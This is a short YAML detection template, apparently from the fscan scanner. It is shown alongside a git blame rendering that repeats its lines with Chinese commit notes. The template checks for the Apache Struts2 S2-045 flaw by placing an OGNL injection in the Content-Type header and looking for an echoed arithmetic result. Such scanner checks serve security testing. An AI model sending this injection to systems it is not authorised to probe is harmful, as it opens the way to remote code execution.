fscan/WebScan/pocs/struts2-045-1.yml

name: poc-yaml-struts2_045-1
set:
  r1: randomInt(800, 1000)
  r2: randomInt(800, 1000)
rules:
  - method: GET
    path: /
    headers:
      Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
    follow_redirects: true
    expression: |
      "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
detail:
  author: shadown1ng(https://github.com/shadown1ng)
修改、添加poc 2021-02-28 15:20:18 +08:00			`name: poc-yaml-struts2_045-1`
			`set:`
			`r1: randomInt(800, 1000)`
			`r2: randomInt(800, 1000)`
			`rules:`
			`- method: GET`
			`path: /`
			`headers:`
			`Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data`
			`follow_redirects: true`
			`expression: \|`
更新mod库、编码、poc等 2021-05-06 11:39:58 +08:00			`"Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))`
修改、添加poc 2021-02-28 15:20:18 +08:00			`detail:`
			`author: shadown1ng(https://github.com/shadown1ng)`